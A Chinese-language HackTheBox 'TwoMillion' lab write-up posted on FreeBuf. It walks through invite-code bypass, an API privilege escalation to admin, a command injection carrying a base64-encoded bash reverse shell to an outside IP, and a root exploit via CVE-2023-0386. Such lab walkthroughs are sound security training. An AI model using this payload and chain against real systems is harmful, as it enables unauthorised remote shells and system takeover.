freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

HTB-TwoMillion-WriteUp
yuji 2025-03-28 21:55:47 3894
所属地 广西

TwoMillion

1、nmap常规扫描

image.png

2、加入hosts解析

image.png

3、查看invite页面,然后查看register页面,

image.png

4、查看invite.min.js文件,发现加密混肴了,扔给gpt解码,成功解出

function i(code) {
var formData = {"code": code};
$.ajax({
 type: "POST",
 dataType: "json",
 data: formData,
 url: '/api/v1/invite/verify',
 success: function(response) {
   console.log(response);
},
 error: function(response) {
   console.log(response);
}
});
}
function j() {
$.ajax({
 type: "POST",
 dataType: "json",
 url: '/api/v1/invite/how/to/generate',
 success: function(response) {
   console.log(response);
},
 error: function(response) {
   console.log(response);
}
});
}

5、访问/api/v1/invite/how/to/generate

image.png

6、rot13解密得到的url

image.png

7、访问解密的url

image.png

8、将得到的验证码base64解密:2ZCUD-A5QRI-DQYWM-0VXDF

image.png

9、利用得到的邀请码解密,注册账号,登录主页面

image.png

10、搜集api接口

image.png

11、尝试访问登陆后的admin接口,不断访问/api/v1/admin/settings/update接口,根据返回的信息修改请求数据,最终将我们的账户成功升级为admin账户

image.png

12、使用/api/v1/admin/vpn/generate,进行命令注入,命令注入的地方在username,考虑后台使用php语言,这里可能的代码是:exec(xxx username xxxx)或者system(xxx username xxxx)。我们可以通过test;id;进行命令注入,这里需要注意的是需要进行base64编码

image.png

payload如下:

{
"username": "test;echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4yOS8xMjM0IDA+JjE= | base64 -d | bash;"
}

13、查看到了数据库密码

image.png

14、使用该密码ssh登录

78c9bd6f9e0c4b9defdbae37d7e91828

image.png

15、上传linpeas.sh,然而pkexec没有suid无法提权

image.png

16、查看/var/mail提示

image.png

“That one in OverlayFS / FUSE looks nasty. We can't get popped by that.”

搜索OverlayFS / FUSE exploits

https://github.com/xkaneiki/CVE-2023-0386

17、复现exp然后拿到root

# 网络安全 # web安全 # CTF
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 yuji 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
HackTheBox靶场WriteUp
yuji LV.4
这家伙太懒了,还未填写个人描述!
  • 15 文章数
  • 1 关注者
HTB-Escape2-WriteUp
2025-03-29
HTB-Cypher-WriteUp
2025-03-29
HTB-DOG-WriteUp
2025-03-29